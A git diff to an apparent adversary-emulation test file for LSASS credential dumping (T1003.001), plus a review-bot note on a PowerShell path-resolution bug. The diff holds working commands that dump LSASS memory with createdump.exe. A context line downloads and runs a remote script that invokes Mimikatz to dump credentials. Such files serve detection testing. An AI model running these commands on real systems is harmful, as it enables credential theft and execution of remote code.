diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 0a3959df..9c1fcdd6 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -287,41 +287,31 @@ atomic_tests: IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds name: powershell elevation_required: true -- name: Dump LSASS with .Net 5 createdump.exe +- name: Dump LSASS with createdump.exe from .Net v5 auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 description: | - This test uses the technique describe in this tweet - (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass + Use createdump executable from .NET to create an LSASS dump. + + [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20) supported_platforms: - windows - input_arguments: - output_file: - description: Path where resulting dump should be placed - type: Path - default: C:\Windows\Temp\dotnet-lsass.dmp - createdump_exe: - description: Path of createdump.exe executable - type: Path - default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe' dependency_executor_name: powershell dependencies: - description: | - Computer must have createdump.exe from .Net 5 + .Net v5 must be installed prereq_command: | - if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} + $exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe" + if (Test-Path $exePath) {exit 0} else {exit 1} get_prereq_command: | - echo ".NET 5 must be installed manually." 
"For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" + winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent executor: command: | - echo "Createdump Path #{createdump_exe}" - $LSASS = tasklist | findstr "lsass" - $FIELDS = $LSASS -split "\s+" - $ID = $FIELDS[1] - & "#{createdump_exe}" -u -f #{output_file} $ID + $exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe" + & "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id cleanup_command: | - Remove-Item #{output_file} -ErrorAction Ignore + Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore name: powershell - elevation_required: true + elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 description: |
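Review bot: The wildcard in `resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"` matches every installed 5.x runtime folder, so on a host with more than one, `$exePath` holds an array and `& "$exePath"` in the new executor command stringifies it into a single space-joined path that cannot be invoked, while the identical line in prereq_command still reports success. Pin a single match in both places, e.g. `$exePath = (resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe" -ErrorAction SilentlyContinue | Select-Object -Last 1).Path`, and guard the prerequisite with `if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}` so a missing runtime exits 1 cleanly instead of surfacing a parameter-binding error from `Test-Path $null`. The new get_prereq_command depends entirely on `winget`, which may not be available on every supported Windows edition (Server images in particular); the dependency description should say so, since the commit drops the manual-install wording that previously covered that case.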